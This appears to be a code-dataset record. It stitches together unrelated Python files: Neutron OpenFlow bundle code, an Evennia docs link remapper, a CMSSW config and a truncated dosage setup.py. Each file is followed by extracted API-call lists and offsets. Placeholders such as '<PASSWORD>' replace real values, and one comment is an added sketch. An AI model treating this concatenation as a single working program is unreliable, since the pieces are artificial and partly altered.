def install_drop(self, table_id=0, priority=0, match=None, **match_kwargs):
self.install_instructions(table_id=table_id, priority=priority,
instructions=[], match=match, **match_kwargs)
def install_instructions(self, instructions,
table_id=0, priority=0,
match=None, active_bundle=None, **match_kwargs):
(dp, ofp, ofpp) = self._get_dp()
match = self._match(ofp, ofpp, match, **match_kwargs)
if isinstance(instructions, six.string_types):
# NOTE: instructions must be str for the ofctl of_interface.
# After the ofctl driver is removed, a deprecation warning
# could be added here.
jsonlist = ofctl_string.ofp_instruction_from_str(
ofp, instructions)
instructions = ofproto_parser.ofp_instruction_from_jsondict(
dp, jsonlist)
msg = ofpp.OFPFlowMod(dp,
table_id=table_id,
cookie=self.default_cookie,
match=match,
priority=priority,
instructions=instructions)
self._send_msg(msg, active_bundle=active_bundle)
def install_apply_actions(self, actions,
table_id=0, priority=0,
match=None, **match_kwargs):
(dp, ofp, ofpp) = self._get_dp()
instructions = [
ofpp.OFPInstructionActions(ofp.OFPIT_APPLY_ACTIONS, actions),
]
self.install_instructions(table_id=table_id,
priority=priority,
match=match,
instructions=instructions,
**match_kwargs)
def bundled(self, atomic=False, ordered=False):
return BundledOpenFlowBridge(self, atomic, ordered)
class BundledOpenFlowBridge(object):
def __init__(self, br, atomic, ordered):
self.br = br
self.active_bundle = None
self.bundle_flags = 0
if not atomic and not ordered:
return
(dp, ofp, ofpp) = self.br._get_dp()
if atomic:
self.bundle_flags |= ofp.ONF_BF_ATOMIC
if ordered:
self.bundle_flags |= ofp.ONF_BF_ORDERED
def __getattr__(self, name):
if name.startswith('install') or name.startswith('uninstall'):
under = getattr(self.br, name)
if self.active_bundle is None:
return under
return functools.partial(under, active_bundle=dict(
id=self.active_bundle, bundle_flags=self.bundle_flags))
raise AttributeError(_("Only install_* or uninstall_* methods "
"can be used"))
def __enter__(self):
if self.active_bundle is not None:
raise ActiveBundleRunning(bundle_id=self.active_bundle)
while True:
self.active_bundle = random.randrange(BUNDLE_ID_WIDTH)
if self.active_bundle not in self.br.active_bundles:
self.br.active_bundles.add(self.active_bundle)
break
try:
(dp, ofp, ofpp) = self.br._get_dp()
msg = ofpp.ONFBundleCtrlMsg(dp, self.active_bundle,
ofp.ONF_BCT_OPEN_REQUEST,
self.bundle_flags, [])
reply = self.br._send_msg(msg, reply_cls=ofpp.ONFBundleCtrlMsg)
if reply.type != ofp.ONF_BCT_OPEN_REPLY:
raise RuntimeError(
_("Unexpected reply type %d != ONF_BCT_OPEN_REPLY") %
reply.type)
return self
except Exception:
self.br.active_bundles.remove(self.active_bundle)
self.active_bundle = None
raise
def __exit__(self, type, value, traceback):
(dp, ofp, ofpp) = self.br._get_dp()
if type is None:
ctrl_type = ofp.ONF_BCT_COMMIT_REQUEST
expected_reply = ofp.ONF_BCT_COMMIT_REPLY
else:
ctrl_type = ofp.ONF_BCT_DISCARD_REQUEST
expected_reply = ofp.ONF_BCT_DISCARD_REPLY
LOG.warning(
"Discarding bundle with ID 0x%(id)x due to an exception",
{'id': self.active_bundle})
try:
msg = ofpp.ONFBundleCtrlMsg(dp, self.active_bundle,
ctrl_type,
self.bundle_flags, [])
reply = self.br._send_msg(msg, reply_cls=ofpp.ONFBundleCtrlMsg)
if reply.type != expected_reply:
# The bundle ID may be in a bad state. Let's leave it
# in active_bundles so that we will never use it again.
raise RuntimeError(_("Unexpected reply type %d") % reply.type)
self.br.active_bundles.remove(self.active_bundle)
finally:
# It is possible the bundle is kept open, but this must be
# cleared or all subsequent __enter__ will fail.
self.active_bundle = None
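# --- Illustrative usage sketch (added; not part of the original module). A
# bridge that mixes in OpenFlowSwitchMixin can group flow modifications into
# one OpenFlow bundle:
#
#   with br.bundled(atomic=True) as bundle:
#       bundle.install_drop(table_id=0, priority=1)
#       bundle.uninstall_flows(table_id=1)
#
# __enter__ opens an ONF bundle on the switch; a clean exit commits it, while
# an exception inside the block discards it (see __exit__ above).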
|
[
"os_ken.app.ofctl.api.send_msg",
"os_ken.lib.ofctl_string.ofp_instruction_from_str",
"oslo_log.log.getLogger",
"os_ken.ofproto.ofproto_parser.ofp_instruction_from_jsondict",
"neutron._i18n._",
"oslo_utils.excutils.save_and_reraise_exception",
"random.randrange",
"os_ken.app.ofctl.api.get_datapath",
"netaddr.IPNetwork",
"eventlet.Timeout",
"oslo_utils.timeutils.now",
"eventlet.sleep"
] |
[((1185, 1212), 'oslo_log.log.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (1202, 1212), True, 'from oslo_log import log as logging\n'), ((1338, 1391), 'neutron._i18n._', '_', (['"""Another active bundle 0x%(bundle_id)x is running"""'], {}), "('Another active bundle 0x%(bundle_id)x is running')\n", (1339, 1391), False, 'from neutron._i18n import _\n'), ((1685, 1706), 'netaddr.IPNetwork', 'netaddr.IPNetwork', (['ip'], {}), '(ip)\n', (1702, 1706), False, 'import netaddr\n'), ((2166, 2181), 'oslo_utils.timeutils.now', 'timeutils.now', ([], {}), '()\n', (2179, 2181), False, 'from oslo_utils import timeutils\n'), ((2890, 2927), 'eventlet.Timeout', 'eventlet.Timeout', ([], {'seconds': 'timeout_sec'}), '(seconds=timeout_sec)\n', (2906, 2927), False, 'import eventlet\n'), ((2219, 2262), 'os_ken.app.ofctl.api.get_datapath', 'ofctl_api.get_datapath', (['self._app', 'dpid_int'], {}), '(self._app, dpid_int)\n', (2241, 2262), True, 'import os_ken.app.ofctl.api as ofctl_api\n'), ((2678, 2695), 'eventlet.sleep', 'eventlet.sleep', (['(1)'], {}), '(1)\n', (2692, 2695), False, 'import eventlet\n'), ((3188, 3246), 'os_ken.app.ofctl.api.send_msg', 'ofctl_api.send_msg', (['self._app', 'msg', 'reply_cls', 'reply_multi'], {}), '(self._app, msg, reply_cls, reply_multi)\n', (3206, 3246), True, 'import os_ken.app.ofctl.api as ofctl_api\n'), ((9031, 9087), 'os_ken.lib.ofctl_string.ofp_instruction_from_str', 'ofctl_string.ofp_instruction_from_str', (['ofp', 'instructions'], {}), '(ofp, instructions)\n', (9068, 9087), False, 'from os_ken.lib import ofctl_string\n'), ((9132, 9190), 'os_ken.ofproto.ofproto_parser.ofp_instruction_from_jsondict', 'ofproto_parser.ofp_instruction_from_jsondict', (['dp', 'jsonlist'], {}), '(dp, jsonlist)\n', (9176, 9190), False, 'from os_ken.ofproto import ofproto_parser\n'), ((11039, 11093), 'neutron._i18n._', '_', (['"""Only install_* or uninstall_* methods can be used"""'], {}), "('Only install_* or uninstall_* methods can be used')\n", (11040, 11093), False, 'from neutron._i18n import _\n'), ((11319, 11352), 'random.randrange', 'random.randrange', (['BUNDLE_ID_WIDTH'], {}), '(BUNDLE_ID_WIDTH)\n', (11335, 11352), False, 'import random\n'), ((2429, 2444), 'oslo_utils.timeutils.now', 'timeutils.now', ([], {}), '()\n', (2442, 2444), False, 'from oslo_utils import timeutils\n'), ((2493, 2523), 'neutron._i18n._', '_', (['"""Switch connection timeout"""'], {}), "('Switch connection timeout')\n", (2494, 2523), False, 'from neutron._i18n import _\n'), ((3310, 3356), 'neutron._i18n._', '_', (['"""ofctl request %(request)s error %(error)s"""'], {}), "('ofctl request %(request)s error %(error)s')\n", (3311, 3356), False, 'from neutron._i18n import _\n'), ((3620, 3657), 'oslo_utils.excutils.save_and_reraise_exception', 'excutils.save_and_reraise_exception', ([], {}), '()\n', (3655, 3657), False, 'from oslo_utils import excutils\n'), ((4825, 4873), 'neutron._i18n._', '_', (['"""cookie=COOKIE_ANY but cookie_mask set to %s"""'], {}), "('cookie=COOKIE_ANY but cookie_mask set to %s')\n", (4826, 4873), False, 'from neutron._i18n import _\n'), ((11942, 11993), 'neutron._i18n._', '_', (['"""Unexpected reply type %d != ONF_BCT_OPEN_REPLY"""'], {}), "('Unexpected reply type %d != ONF_BCT_OPEN_REPLY')\n", (11943, 11993), False, 'from neutron._i18n import _\n'), ((13174, 13203), 'neutron._i18n._', '_', (['"""Unexpected reply type %d"""'], {}), "('Unexpected reply type %d')\n", (13175, 13203), False, 'from neutron._i18n import _\n'), ((3763, 3803), 'neutron._i18n._', '_', (['"""ofctl 
request %(request)s timed out"""'], {}), "('ofctl request %(request)s timed out')\n", (3764, 3803), False, 'from neutron._i18n import _\n')]
|
"""
Build a TOC-tree; Sphinx requires it and this makes it easy to just
add/build/link new files without needing to explicitly add it to a toctree
directive somewhere.
"""
import re
from collections import defaultdict
from sphinx.errors import DocumentError
from pathlib import Path
from os.path import abspath, dirname, join as pathjoin, sep, relpath
_IGNORE_FILES = []
_SOURCEDIR_NAME = "source"
_SOURCE_DIR = pathjoin(dirname(dirname(abspath(__file__))), _SOURCEDIR_NAME)
_TOC_FILE = pathjoin(_SOURCE_DIR, "toc.md")
_NO_REMAP_STARTSWITH = [
"http://",
"https://",
"github:",
"api:",
"feature-request",
"report-bug",
"issue",
"bug-report",
]
TXT_REMAPS = {}
URL_REMAPS = {}
_USED_REFS = {}
_CURRFILE = None
def auto_link_remapper():
"""
- Auto-Remaps links to fit with the actual document file structure. Requires
all doc files to have a unique name.
- Creates source/toc.md file
"""
global _CURRFILE
print(" -- Auto-Remapper starting.")
def _get_rel_source_ref(path):
"""Get the path relative the source/ dir"""
pathparts = path.split("/")
# we allow a max of 4 levels of nesting in the source dir
ind = pathparts[-5:].index(_SOURCEDIR_NAME)
# get the part after source/
pathparts = pathparts[-5 + 1 + ind :]
url = "/".join(pathparts)
# get the reference, without .md
url = url.rsplit(".", 1)[0]
return url
toc_map = {}
docref_map = defaultdict(dict)
for path in Path(_SOURCE_DIR).rglob("*.md"):
# find the source/ part of the path and strip it out
if path.name in _IGNORE_FILES:
# this is the name including .md
continue
sourcepath = path.as_posix()
# get name and url relative to source/
fname = path.name.rsplit(".", 1)[0]
src_url = _get_rel_source_ref(sourcepath)
# check for duplicate files
if fname in toc_map:
duplicate_src_url = toc_map[fname]
raise DocumentError(
f" Tried to add {src_url}.md, but a file {duplicate_src_url}.md already exists.\n"
" Evennia's auto-link-corrector does not accept doc-files with the same \n"
" name, even in different folders. Rename one.\n"
)
toc_map[fname] = src_url
# find relative links to all other files
for targetpath in Path(_SOURCE_DIR).rglob("*.md"):
targetname = targetpath.name.rsplit(".", 1)[0]
targetpath = targetpath.as_posix()
url = relpath(targetpath, dirname(sourcepath))
if not "/" in url:
# need to be explicit or there will be link ref collisions between
# e.g. TickerHandler page and TickerHandle api node
url = "./" + url
docref_map[sourcepath][targetname] = url.rsplit(".", 1)[0]
# normal reference-links [txt](urls)
ref_regex = re.compile(
r"\[(?P<txt>[\w -\[\]\`]+?)\]\((?P<url>.+?)\)", re.I + re.S + re.U + re.M
)
# in document references
ref_doc_regex = re.compile(
r"\[(?P<txt>[\w -\`]+?)\]:\s+?(?P<url>.+?)(?=$|\n)", re.I + re.S + re.U + re.M
)
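    # Illustrative matches (added note): ref_regex captures inline links such
    # as "[My Page](./My-Page.md)" -> txt="My Page", url="./My-Page.md";
    # ref_doc_regex captures reference-style definitions at the bottom of a
    # page, such as "[My Page]: ./My-Page.md".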
def _sub(match):
# inline reference links
global _USED_REFS
grpdict = match.groupdict()
txt, url = grpdict["txt"], grpdict["url"]
txt = TXT_REMAPS.get(txt, txt)
url = URL_REMAPS.get(url, url)
if any(url.startswith(noremap) for noremap in _NO_REMAP_STARTSWITH):
return f"[{txt}]({url})"
if "http" in url and "://" in url:
urlout = url
else:
fname, *part = url.rsplit("/", 1)
fname = part[0] if part else fname
fname = fname.rsplit(".", 1)[0]
fname, *anchor = fname.rsplit("#", 1)
if not _CURRFILE.endswith("toc.md"):
_USED_REFS[fname] = url
if _CURRFILE in docref_map and fname in docref_map[_CURRFILE]:
cfilename = _CURRFILE.rsplit("/", 1)[-1]
urlout = docref_map[_CURRFILE][fname] + ("#" + anchor[0] if anchor else "")
if urlout != url:
print(f" {cfilename}: [{txt}]({url}) -> [{txt}]({urlout})")
else:
urlout = url
return f"[{txt}]({urlout})"
def _sub_doc(match):
# reference links set at the bottom of the page
global _USED_REFS
grpdict = match.groupdict()
txt, url = grpdict["txt"], grpdict["url"]
txt = TXT_REMAPS.get(txt, txt)
url = URL_REMAPS.get(url, url)
if any(url.startswith(noremap) for noremap in _NO_REMAP_STARTSWITH):
return f"[{txt}]: {url}"
if "http" in url and "://" in url:
urlout = url
else:
fname, *part = url.rsplit("/", 1)
fname = part[0] if part else fname
fname = fname.rsplit(".", 1)[0]
fname, *anchor = fname.rsplit("#", 1)
if not _CURRFILE.endswith("toc.md"):
_USED_REFS[fname] = url
if _CURRFILE in docref_map and fname in docref_map[_CURRFILE]:
cfilename = _CURRFILE.rsplit("/", 1)[-1]
urlout = docref_map[_CURRFILE][fname] + ("#" + anchor[0] if anchor else "")
if urlout != url:
print(f" {cfilename}: [{txt}]: {url} -> [{txt}]: {urlout}")
else:
urlout = url
return f"[{txt}]: {urlout}"
# replace / correct links in all files
count = 0
for path in sorted(Path(_SOURCE_DIR).rglob("*.md"), key=lambda p: p.name):
# from pudb import debugger;debugger.Debugger().set_trace()
_CURRFILE = path.as_posix()
with open(path, "r") as fil:
intxt = fil.read()
outtxt = ref_regex.sub(_sub, intxt)
outtxt = ref_doc_regex.sub(_sub_doc, outtxt)
if intxt != outtxt:
with open(path, "w") as fil:
fil.write(outtxt)
count += 1
print(f" -- Auto-relinked links in {path.name}")
if count > 0:
print(f" -- Auto-corrected links in {count} documents.")
for (fname, src_url) in sorted(toc_map.items(), key=lambda tup: tup[0]):
if fname not in _USED_REFS:
print(f" ORPHANED DOC: no refs found to {src_url}.md")
# write tocfile
with open(_TOC_FILE, "w") as fil:
fil.write("# Toc\n")
fil.write("- [API root](api/evennia-api.rst)")
for ref in sorted(toc_map.values()):
if ref == "toc":
continue
if "Part1/" in ref:
continue
if not "/" in ref:
ref = "./" + ref
linkname = ref.replace("-", " ")
fil.write(f"\n- [{linkname}]({ref})")
# we add a self-reference so the toc itself is also a part of a toctree
fil.write("\n\n```toctree::\n :hidden:\n\n toc\n```")
print(" -- Auto-Remapper finished.")
if __name__ == "__main__":
auto_link_remapper()
|
[
"os.path.abspath",
"os.path.dirname",
"sphinx.errors.DocumentError",
"collections.defaultdict",
"pathlib.Path",
"os.path.join",
"re.compile"
] |
[((490, 521), 'os.path.join', 'pathjoin', (['_SOURCE_DIR', '"""toc.md"""'], {}), "(_SOURCE_DIR, 'toc.md')\n", (498, 521), True, 'from os.path import abspath, dirname, join as pathjoin, sep, relpath\n'), ((1503, 1520), 'collections.defaultdict', 'defaultdict', (['dict'], {}), '(dict)\n', (1514, 1520), False, 'from collections import defaultdict\n'), ((2986, 3083), 're.compile', 're.compile', (['"""\\\\[(?P<txt>[\\\\w -\\\\[\\\\]\\\\`]+?)\\\\]\\\\((?P<url>.+?)\\\\)"""', '(re.I + re.S + re.U + re.M)'], {}), "('\\\\[(?P<txt>[\\\\w -\\\\[\\\\]\\\\`]+?)\\\\]\\\\((?P<url>.+?)\\\\)', re.I + re\n .S + re.U + re.M)\n", (2996, 3083), False, 'import re\n'), ((3135, 3234), 're.compile', 're.compile', (['"""\\\\[(?P<txt>[\\\\w -\\\\`]+?)\\\\]:\\\\s+?(?P<url>.+?)(?=$|\\\\n)"""', '(re.I + re.S + re.U + re.M)'], {}), "('\\\\[(?P<txt>[\\\\w -\\\\`]+?)\\\\]:\\\\s+?(?P<url>.+?)(?=$|\\\\n)', re.I +\n re.S + re.U + re.M)\n", (3145, 3234), False, 'import re\n'), ((440, 457), 'os.path.abspath', 'abspath', (['__file__'], {}), '(__file__)\n', (447, 457), False, 'from os.path import abspath, dirname, join as pathjoin, sep, relpath\n'), ((1538, 1555), 'pathlib.Path', 'Path', (['_SOURCE_DIR'], {}), '(_SOURCE_DIR)\n', (1542, 1555), False, 'from pathlib import Path\n'), ((2048, 2276), 'sphinx.errors.DocumentError', 'DocumentError', (['f""" Tried to add {src_url}.md, but a file {duplicate_src_url}.md already exists.\n Evennia\'s auto-link-corrector does not accept doc-files with the same \n name, even in different folders. Rename one.\n"""'], {}), '(\n f""" Tried to add {src_url}.md, but a file {duplicate_src_url}.md already exists.\n Evennia\'s auto-link-corrector does not accept doc-files with the same \n name, even in different folders. Rename one.\n"""\n )\n', (2061, 2276), False, 'from sphinx.errors import DocumentError\n'), ((2443, 2460), 'pathlib.Path', 'Path', (['_SOURCE_DIR'], {}), '(_SOURCE_DIR)\n', (2447, 2460), False, 'from pathlib import Path\n'), ((2621, 2640), 'os.path.dirname', 'dirname', (['sourcepath'], {}), '(sourcepath)\n', (2628, 2640), False, 'from os.path import abspath, dirname, join as pathjoin, sep, relpath\n'), ((5638, 5655), 'pathlib.Path', 'Path', (['_SOURCE_DIR'], {}), '(_SOURCE_DIR)\n', (5642, 5655), False, 'from pathlib import Path\n')]
|
import FWCore.ParameterSet.Config as cms
l1MetFilterRecoTree = cms.EDAnalyzer("L1MetFilterRecoTreeProducer",
triggerResultsToken = cms.untracked.InputTag("TriggerResults::RECO"),
hbheNoiseFilterResultToken = cms.untracked.InputTag("HBHENoiseFilterResultProducer:HBHENoiseFilterResult")
)
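# Illustrative use in a CMSSW configuration (added; assumes a standard
# cms.Process is already defined as "process"):
#   process.l1MetFilterRecoTree = l1MetFilterRecoTree
#   process.p = cms.Path(process.l1MetFilterRecoTree)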
|
[
"FWCore.ParameterSet.Config.untracked.InputTag"
] |
[((149, 195), 'FWCore.ParameterSet.Config.untracked.InputTag', 'cms.untracked.InputTag', (['"""TriggerResults::RECO"""'], {}), "('TriggerResults::RECO')\n", (171, 195), True, 'import FWCore.ParameterSet.Config as cms\n'), ((235, 312), 'FWCore.ParameterSet.Config.untracked.InputTag', 'cms.untracked.InputTag', (['"""HBHENoiseFilterResultProducer:HBHENoiseFilterResult"""'], {}), "('HBHENoiseFilterResultProducer:HBHENoiseFilterResult')\n", (257, 312), True, 'import FWCore.ParameterSet.Config as cms\n')]
|
#!/usr/bin/env python
# -*- coding: iso-8859-1 -*-
# Copyright (C) 2004-2005 <NAME> and <NAME>
# Copyright (C) 2012-2014 <NAME>
"""
Setup file for the distuils module.
It includes the following features:
- py2exe support (including InnoScript installer generation)
- Microsoft Visual C++ DLL installation for py2exe
- creation and installation of configuration files with installation data
- automatic MANIFEST.in check
"""
from __future__ import print_function
import os
import sys
import codecs
import re
import glob
import shutil
import subprocess
import warnings
try:
# py2exe monkey-patches the distutils.core.Distribution class
# So we need to import it before importing the Distribution class
import py2exe
has_py2exe = True
except ImportError:
# py2exe is not installed
has_py2exe = False
from distutils.core import setup, Distribution
from distutils.command.install_lib import install_lib
from distutils.command.register import register
from distutils import util
from distutils.file_util import write_file
AppVersion = '2.16'
AppName = 'dosage'
py_excludes = ['doctest', 'unittest', 'Tkinter', 'pdb',
'email', 'ftplib', 'pickle',
]
py_includes = ['dosagelib.plugins.*']
# py2exe options for Windows packaging
py2exe_options = dict(
packages=["encodings"],
excludes=py_excludes,
includes=py_includes,
# silence py2exe error about not finding msvcp90.dll
dll_excludes=['MSVCP90.dll'],
compressed=1,
optimize=2,
)
warnings.filterwarnings("ignore", r"Unknown distribution option")
def normpath (path):
"""Norm a path name to platform specific notation."""
return os.path.normpath(path)
def cnormpath (path):
"""Norm a path name to platform specific notation and make it absolute."""
path = normpath(path)
if os.name == 'nt':
# replace slashes with backslashes
path = path.replace("/", "\\")
if not os.path.isabs(path):
path = normpath(os.path.join(sys.prefix, path))
return path
release_ro = re.compile(r"\(released (.+)\)")
def get_release_date ():
"""Parse and return relase date as string from doc/changelog.txt."""
fname = os.path.join("doc", "changelog.txt")
release_date = "unknown"
with open(fname) as fd:
# the release date is on the first line
line = fd.readline()
mo = release_ro.search(line)
if mo:
            release_date = mo.group(1)
return release_date
# Microsoft Visual C++ runtime version (tested with Python 2.7.2)
MSVCP90Version = '9.0.21022.8'
MSVCP90Token = '<PASSWORD>'
if os.name == 'nt':
data_files = []
else:
data_files = [('share/man/man1', ['doc/dosage.1'])]
def get_nt_platform_vars ():
"""Return program file path and architecture for NT systems."""
platform = util.get_platform()
if platform == "win-amd64":
# the Visual C++ runtime files are installed in the x86 directory
progvar = "%ProgramFiles(x86)%"
architecture = "amd64"
elif platform == "win32":
progvar = "%ProgramFiles%"
architecture = "x86"
else:
raise ValueError("Unsupported platform %r" % platform)
return os.path.expandvars(progvar), architecture
def add_msvc_files (files):
"""Add needed MSVC++ runtime files. Only Version 9.0.21022.8 is tested
and can be downloaded here:
http://www.microsoft.com/en-us/download/details.aspx?id=29
"""
prog_dir, architecture = get_nt_platform_vars()
dirname = "Microsoft.VC90.CRT"
version = "%s_%s_x-ww_d08d0375" % (MSVCP90Token, MSVCP90Version)
args = (architecture, dirname, version)
path = r'C:\Windows\WinSxS\%s_%s_%s\*.*' % args
files.append((dirname, glob.glob(path)))
# Copy the manifest file into the build directory and rename it
# because it must have the same name as the directory.
path = r'C:\Windows\WinSxS\Manifests\%s_%s_%s.manifest' % args
target = os.path.join(os.getcwd(), 'build', '%s.manifest' % dirname)
shutil.copy(path, target)
files.append((dirname, [target]))
if 'py2exe' in sys.argv[1:]:
if not has_py2exe:
raise SystemExit("py2exe module could not be imported")
add_msvc_files(data_files)
class MyInstallLib (install_lib, object):
"""Custom library installation."""
def install (self):
"""Install the generated config file."""
outs = super(MyInstallLib, self).install()
infile = self.create_conf_file()
outfile = os.path.join(self.install_dir, os.path.basename(infile))
self.copy_file(infile, outfile)
outs.append(outfile)
return outs
def create_conf_file (self):
"""Create configuration file."""
cmd_obj = self.distribution.get_command_obj("install")
cmd_obj.ensure_finalized()
# we have to write a configuration file because we need the
# <install_data> directory (and other stuff like author, url, ...)
# all paths are made absolute by cnormpath()
data = []
for d in ['purelib', 'platlib', 'lib', 'headers', 'scripts', 'data']:
attr = 'install_%s' % d
if cmd_obj.root:
# cut off root path prefix
cutoff = len(cmd_obj.root)
# don't strip the path separator
if cmd_obj.root.endswith(os.sep):
cutoff -= 1
val = getattr(cmd_obj, attr)[cutoff:]
else:
val = getattr(cmd_obj, attr)
if attr == 'install_data':
cdir = os.path.join(val, "share", "dosage")
data.append('config_dir = %r' % cnormpath(cdir))
elif attr == 'install_lib':
if cmd_obj.root:
_drive, tail = os.path.splitdrive(val)
if tail.startswith(os.sep):
tail = tail[1:]
self.install_lib = os.path.join(cmd_obj.root, tail)
else:
self.install_lib = val
data.append("%s = %r" % (attr, cnormpath(val)))
self.distribution.create_conf_file(data, directory=self.install_lib)
return self.get_conf_output()
def get_conf_output (self):
"""Get filename for distribution configuration file."""
return self.distribution.get_conf_filename(self.install_lib)
def get_outputs (self):
"""Add the generated config file to the list of outputs."""
outs = super(MyInstallLib, self).get_outputs()
conf_output = self.get_conf_output()
outs.append(conf_output)
if self.compile:
outs.extend(self._bytecode_filenames([conf_output]))
return outs
class MyDistribution (Distribution, object):
"""Custom distribution class generating config file."""
def __init__ (self, attrs):
"""Set console and windows scripts."""
super(MyDistribution, self).__init__(attrs)
self.console = ['dosage']
def run_commands (self):
"""Generate config file and run commands."""
cwd = os.getcwd()
data = []
data.append('config_dir = %r' % os.path.join(cwd, "config"))
data.append("install_data = %r" % cwd)
data.append("install_scripts = %r" % cwd)
self.create_conf_file(data)
super(MyDistribution, self).run_commands()
def get_conf_filename (self, directory):
"""Get name for config file."""
return os.path.join(directory, "_%s_configdata.py" % self.get_name())
def create_conf_file (self, data, directory=None):
"""Create local config file from given data (list of lines) in
the directory (or current directory if not given)."""
data.insert(0, "# this file is automatically created by setup.py")
data.insert(0, "# -*- coding: iso-8859-1 -*-")
if directory is None:
directory = os.getcwd()
filename = self.get_conf_filename(directory)
# add metadata
metanames = ("name", "version", "author", "author_email",
"maintainer", "maintainer_email", "url",
"license", "description", "long_description",
"keywords", "platforms", "fullname", "contact",
"contact_email")
for name in metanames:
method = "get_" + name
val = getattr(self.metadata, method)()
data.append("%s = %r" % (name, val))
data.append('release_date = "%s"' % get_release_date())
# write the config file
util.execute(write_file, (filename, data),
"creating %s" % filename, self.verbose >= 1, self.dry_run)
class InnoScript:
"""Class to generate INNO script."""
def __init__(self, lib_dir, dist_dir, windows_exe_files=[],
console_exe_files=[], service_exe_files=[],
comserver_files=[], lib_files=[]):
"""Store INNO script infos."""
self.lib_dir = lib_dir
self.dist_dir = dist_dir
if not self.dist_dir[-1] in "\\/":
self.dist_dir += "\\"
self.name = AppName
self.lname = AppName.lower()
self.version = AppVersion
self.windows_exe_files = [self.chop(p) for p in windows_exe_files]
self.console_exe_files = [self.chop(p) for p in console_exe_files]
self.service_exe_files = [self.chop(p) for p in service_exe_files]
self.comserver_files = [self.chop(p) for p in comserver_files]
self.lib_files = [self.chop(p) for p in lib_files]
self.icon = os.path.abspath(r'doc\icon\favicon.ico')
def chop(self, pathname):
"""Remove distribution directory from path name."""
assert pathname.startswith(self.dist_dir)
return pathname[len(self.dist_dir):]
def create(self, pathname=r"dist\omt.iss"):
"""Create Inno script."""
print("*** creating the inno setup script ***")
self.pathname = pathname
self.distfilebase = "%s-%s" % (self.name, self.version)
self.distfile = self.distfilebase + ".exe"
with open(self.pathname, "w") as fd:
self.write_inno_script(fd)
def write_inno_script (self, fd):
"""Write Inno script contents."""
print("; WARNING: This script has been created by py2exe. Changes to this script", file=fd)
print("; will be overwritten the next time py2exe is run!", file=fd)
print("[Setup]", file=fd)
print("AppName=%s" % self.name, file=fd)
print("AppVerName=%s %s" % (self.name, self.version), file=fd)
print("ChangesEnvironment=true", file=fd)
print(r"DefaultDirName={pf}\%s" % self.name, file=fd)
print("DefaultGroupName=%s" % self.name, file=fd)
print("OutputBaseFilename=%s" % self.distfilebase, file=fd)
print("OutputDir=..", file=fd)
print("SetupIconFile=%s" % self.icon, file=fd)
print(file=fd)
print("[Tasks]", file=fd)
print("Name: modifypath; Description: Add application directory to %PATH%", file=fd)
print(file=fd)
# List of source files
files = self.windows_exe_files + \
self.console_exe_files + \
self.service_exe_files + \
self.comserver_files + \
self.lib_files
print('[Files]', file=fd)
for path in files:
print(r'Source: "%s"; DestDir: "{app}\%s"; Flags: ignoreversion' % (path, os.path.dirname(path)), file=fd)
# Set icon filename
print('[Icons]', file=fd)
for path in self.windows_exe_files:
print(r'Name: "{group}\%s"; Filename: "{app}\%s"' %
(self.name, path), file=fd)
for path in self.console_exe_files:
name = os.path.basename(path).capitalize()
print(r'Name: "{group}\%s help"; Filename: "cmd.exe"; Parameters: "/K %s --help"' % (name, path), file=fd)
print(r'Name: "{group}\Uninstall %s"; Filename: "{uninstallexe}"' % self.name, file=fd)
print(file=fd)
# Uninstall optional log files
print('[UninstallDelete]', file=fd)
for path in (self.console_exe_files + self.windows_exe_files):
exename = os.path.basename(path)
print(r'Type: files; Name: "{pf}\%s\%s.log"' % (self.lname, exename), file=fd)
print(file=fd)
# Add app dir to PATH
print("[Code]", file=fd)
print("""\
const
ModPathName = 'modifypath';
ModPathType = 'user';
function ModPathDir(): TArrayOfString;
begin
setArrayLength(Result, 1)
Result[0] := ExpandConstant('{app}');
end;
#include "modpath.iss"
""", file=fd)
shutil.copy(r"scripts\modpath.iss", "dist")
def compile (self):
"""Compile Inno script with iscc.exe."""
print("*** compiling the inno setup script ***")
progpath = get_nt_platform_vars()[0]
cmd = r'%s\Inno Setup 5\iscc.exe' % progpath
subprocess.check_call([cmd, self.pathname])
def sign (self):
"""Sign InnoSetup installer with local self-signed certificate."""
print("*** signing the inno setup installer ***")
pfxfile = r'scripts\%s.pfx' % self.lname
if os.path.isfile(pfxfile):
path = get_windows_sdk_path()
signtool = os.path.join(path, "bin", "signtool.exe")
if os.path.isfile(signtool):
cmd = [signtool, 'sign', '/f', pfxfile, self.distfile]
subprocess.check_call(cmd)
else:
print("No signed installer: signtool.exe not found.")
else:
print("No signed installer: certificate %s not found." % pfxfile)
def get_windows_sdk_path():
"""Return path of Microsoft Windows SDK installation, or None if
not found."""
try:
import _winreg as winreg
except ImportError:
import winreg
sub_key = r"Software\Microsoft\Microsoft SDKs\Windows"
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, sub_key) as key:
            name = "CurrentInstallFolder"
            return winreg.QueryValueEx(key, name)[0]
    except OSError:
        return None
try:
from py2exe.build_exe import py2exe as py2exe_build
class MyPy2exe (py2exe_build):
"""First builds the exe file(s), then creates a Windows installer.
Needs InnoSetup to be installed."""
def run (self):
"""Generate py2exe installer."""
# First, let py2exe do it's work.
py2exe_build.run(self)
print("*** preparing the inno setup script ***")
lib_dir = self.lib_dir
dist_dir = self.dist_dir
# create the Installer, using the files py2exe has created.
script = InnoScript(lib_dir, dist_dir, self.windows_exe_files,
self.console_exe_files, self.service_exe_files,
self.comserver_files, self.lib_files)
script.create()
script.compile()
script.sign()
except ImportError:
class MyPy2exe:
"""Dummy py2exe class."""
pass
class MyRegister (register, object):
"""Custom register command."""
def build_post_data(self, action):
"""Force application name to lower case."""
data = super(MyRegister, self).build_post_data(action)
data['name'] = data['name'].lower()
return data
def get_authors():
"""Read list of authors from a text file, filtering comments."""
authors = []
authorfile = os.path.join('doc', 'authors.txt')
with codecs.open(authorfile, 'r', 'utf-8') as f:
for line in f:
line = line.strip()
if line and not line.startswith(u'#'):
authors.append(line)
return u", ".join(authors)
args = dict(
name = AppName,
version = AppVersion,
description = 'a comic strip downloader and archiver',
keywords = 'comic,webcomic,downloader,archiver',
author = get_authors(),
maintainer = '<NAME>',
maintainer_email = '<EMAIL>',
license = 'MIT',
url = 'http://wummel.github.io/dosage/',
packages = (
'dosagelib',
'dosagelib.plugins',
),
data_files = data_files,
scripts = (
'dosage',
),
distclass = MyDistribution,
cmdclass = {
'install_lib': MyInstallLib,
'py2exe': MyPy2exe,
'register': MyRegister,
},
options = {
"py2exe": py2exe_options,
},
classifiers = (
'Environment :: Console',
'Intended Audience :: End Users/Desktop',
'Topic :: Multimedia :: Graphics',
